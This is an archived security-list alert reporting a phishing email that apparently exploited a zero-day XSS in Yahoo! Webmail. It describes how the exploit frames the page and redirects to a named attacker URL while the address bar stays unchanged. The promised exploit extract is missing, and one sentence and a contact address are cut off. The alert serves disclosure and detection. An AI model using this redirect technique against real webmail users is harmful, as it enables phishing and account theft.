TUCoPS :: Web :: Specific Sites :: b06-1680.htm

Yahoo! Webmail XSS
Alert - Yahoo! Webmail XSS
Alert - Yahoo! Webmail XSS


I just got a targeted phishing attack to one of my
Yahoo email accounts, what it=B4s insteresting it's that
the attack exploits a Yahoo! webmail 0day XSS
I'm trying to contact Yahoo right now but in the
meantime I thought it will be good to provide some
bits because the seriousness of this . 
When you browse a message on Yahoo! Webmail the XSS
exploit creates a frameset and redirects to
http://w00tynetwork.com/x/ ,it's interesting that the 
address bar at IE dosn=B4t refresh to show the actual
URL, you can only see the redirection to
http://w00tynetwork.com/x/ on IE status bar if you 
have it visible.
I don't know if this vulnerability is being exploited
on the wild since it was a targeted attack, I'm sure
about this because the content of the message.

Here is an extract from the exploit so you can start
build some signatures, filtering, etc.

I will provide full details later when Yahoo! fix the
If security vendors are insterested on full details
plese ask for them at info>at.http://mail.yahoo.com 

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986- AOH